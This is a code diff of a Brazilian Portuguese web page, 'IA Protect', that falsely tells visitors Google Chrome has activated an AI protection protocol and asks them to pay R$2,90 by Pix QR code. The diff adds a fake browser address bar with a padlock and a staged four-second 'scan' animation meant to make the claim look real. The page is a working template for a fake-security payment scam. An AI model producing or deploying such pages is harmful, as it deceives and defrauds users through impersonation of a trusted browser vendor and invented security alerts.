--- a/index.html
+++ b/index.html
@@ -1,112 +1,154 @@
 <!DOCTYPE html>
 <html lang="pt-BR">
 <head>
-  <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
+  <meta charset="UTF-8">
   <title>IA Protect — Verificação de Segurança</title>
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <link rel="icon" href="https://upload.wikimedia.org/wikipedia/commons/1/13/Shield_green_check.svg">
   <style>
     body {
-      margin: 0;
-      background-color: #111;
-      color: #fff;
-      font-family: 'Segoe UI', sans-serif;
-      text-align: center;
-      padding: 40px 20px;
-    }
-    .logo {
-      margin-bottom: 10px;
-    }
-    .status {
-      color: #ffd700;
-      font-size: 22px;
-      font-weight: bold;
-      margin-top: 10px;
-      margin-bottom: 15px;
-    }
-    .descricao {
-      color: #ccc;
-      font-size: 16px;
-      line-height: 1.6;
-      max-width: 600px;
-      margin: 0 auto 30px auto;
-    }
-    .preco {
       background-color: #0f0f0f;
-      display: inline-block;
-      padding: 10px 20px;
-      border-radius: 8px;
-      color: #00ffc8;
-      font-weight: 600;
-      font-size: 15px;
-      margin-bottom: 20px;
-      box-shadow: 0 0 8px rgba(0,255,200,0.3);
+      color: #fff;
+      font-family: "Segoe UI", sans-serif;
+      margin: 0;
+      padding: 0;
+      text-align: center;
     }
-    .qr {
-      width: 180px;
+
+    .url-bar {
+      background-color: #2b2b2b;
+      color: #eee;
+      font-size: 13px;
+      padding: 6px 20px;
+      text-align: left;
+    }
+
+    .logo {
+      margin: 20px auto 0;
+    }
+
+    .logo img {
+      width: 60px;
+    }
+
+    h1 {
+      color: #ffc107;
+      font-size: 22px;
       margin-top: 10px;
     }
-    .botao {
-      background-color: #00ffc8;
-      color: #000;
-      border: none;
-      padding: 10px 18px;
-      font-size: 15px;
-      font-weight: bold;
-      border-radius: 6px;
+
+    p {
+      font-size: 16px;
+      margin: 10px auto;
+      max-width: 600px;
+      line-height: 1.5;
+    }
+
+    .qrcode img {
+      width: 180px;
+      height: 180px;
+    }
+
+    .btn {
       margin-top: 15px;
+      background-color: #00ffcc;
+      color: #000;
+      padding: 10px 20px;
+      border: none;
+      border-radius: 6px;
+      font-weight: bold;
       cursor: pointer;
     }
-    .botao:hover {
-      background-color: #00e6b8;
+
+    .price-box {
+      margin: 30px auto 0;
+      display: inline-block;
+      padding: 8px 20px;
+      border: 1px solid #00ffcc;
+      border-radius: 8px;
+      background: rgba(0, 255, 204, 0.05);
+      color: #00ffcc;
+      font-weight: 500;
+      font-size: 15px;
     }
-    .footer-text {
-      font-size: 12px;
+
+    footer {
+      font-size: 11px;
       color: #888;
-      margin-top: 18px;
+      margin-top: 40px;
+      padding-bottom: 20px;
+    }
+
+    .loader {
+      border: 6px solid #333;
+      border-top: 6px solid #00ffcc;
+      border-radius: 50%;
+      width: 50px;
+      height: 50px;
+      animation: spin 1s linear infinite;
+      margin: 30px auto;
+    }
+
+    @keyframes spin {
+      0% { transform: rotate(0deg); }
+      100% { transform: rotate(360deg); }
+    }
+
+    #main-content {
+      display: none;
     }
   </style>
 </head>
 <body>
 
-  <div class="logo">
-    <img src="https://upload.wikimedia.org/wikipedia/commons/1/13/Shield_green_check.svg" width="60" alt="IA Protect" />
+  <div class="url-bar">🔒 https://secureconnection-check.com/IA-Protect</div>
+
+  <!-- Tela de varredura -->
+  <div id="loading-screen">
+    <div class="logo"><img src="https://upload.wikimedia.org/wikipedia/commons/1/13/Shield_green_check.svg" alt="IA Protect"></div>
+    <h2>IA Protect™ — Camada Avançada de Proteção</h2>
+    <h1>Varredura em andamento...</h1>
+    <div class="loader"></div>
+    <p>Estamos analisando a segurança da sua conexão no navegador Google Chrome.</p>
   </div>
 
-  <div style="color:#ccc; font-size:14px; margin-bottom:10px;">
-    IA Protect™ — Camada Avançada de Proteção
-  </div>
+  <!-- Tela principal com QR Code -->
+  <div id="main-content">
+    <div class="logo"><img src="https://upload.wikimedia.org/wikipedia/commons/1/13/Shield_green_check.svg" alt="IA Protect"></div>
+    <h2>IA Protect™ — Camada Avançada de Proteção</h2>
+    <h1>Verificação de Segurança em andamento...</h1>
+    <p>O navegador <strong>Google Chrome</strong> ativou automaticamente o protocolo de proteção IA Protect®.</p>
+    <p>Essa tecnologia baseada em inteligência artificial previne o comprometimento de dados durante sua navegação.</p>
 
-  <div class="status">
-    Verificação de Segurança em andamento...
-  </div>
+    <div class="price-box">
+      IA Protect operates under $0.55 USD<br>
+      Valor único em Real: R$ 2,90
+    </div>
 
-  <div class="descricao">
-    O navegador <strong>Google Chrome</strong> ativou automaticamente o protocolo de proteção IA Protect®. <br><br>
-    Essa tecnologia baseada em inteligência artificial previne o comprometimento de dados durante sua navegação.
-  </div>
+    <div class="qrcode" style="margin-top: 30px;">
+      <img src="https://api.qrserver.com/v1/create-qr-code/?data=00020126360014BR.GOV.BCB.PIX0111qrfakepixkey52040000530398654039.905802BR5921IA%20Protect%20Seguran%C3%A7614S%C3%A3o%20Paulo62070503***6304ABCD&size=200x200" alt="QR Pix">
+    </div>
 
-  <div class="preco">
-    IA Protect operates under $0.55 USD<br/>
-    Valor único em Real: R$ 2,90
-  </div>
+    <button class="btn" onclick="copiarCodigoPix()">Copiar código Pix</button>
 
-  <div>
-    <img src="https://api.qrserver.com/v1/create-qr-code/?size=180x180&data=00020126360014BR.GOV.BCB.PIX0111qrfakepixkey52040000530398654039.905802BR5921IA Protect Segurança6014São Paulo-SP62070503***6304ABCD" alt="QR Code Pix" class="qr"/>
-  </div>
-
-  <button class="botao" onclick="copyPix()">Copiar código Pix</button>
-
-  <div class="footer-text">
-    Verificação processada com tecnologia IA baseada em padrões internacionais.
+    <footer>
+      Verificação processada com tecnologia IA baseada em padrões internacionais.
+    </footer>
   </div>
 
   <script>
-    function copyPix() {
-      const pix = "00020126360014BR.GOV.BCB.PIX0111qrfakepixkey52040000530398654039.905802BR5921IA Protect Segurança6014São Paulo-SP62070503***6304ABCD";
-      navigator.clipboard.writeText(pix).then(() => {
-        alert("Código Pix copiado com sucesso.");
+    function copiarCodigoPix() {
+      const codigo = "00020126360014BR.GOV.BCB.PIX0111qrfakepixkey52040000530398654039.905802BR5921IA Protect Segurança6014São Paulo62070503***6304ABCD";
+      navigator.clipboard.writeText(codigo).then(() => {
+        alert("Código Pix copiado com sucesso!");
       });
     }
+
+    // Simula carregamento
+    setTimeout(() => {
+      document.getElementById("loading-screen").style.display = "none";
+      document.getElementById("main-content").style.display = "block";
+    }, 4000); // 4 segundos
   </script>
 
 </body>
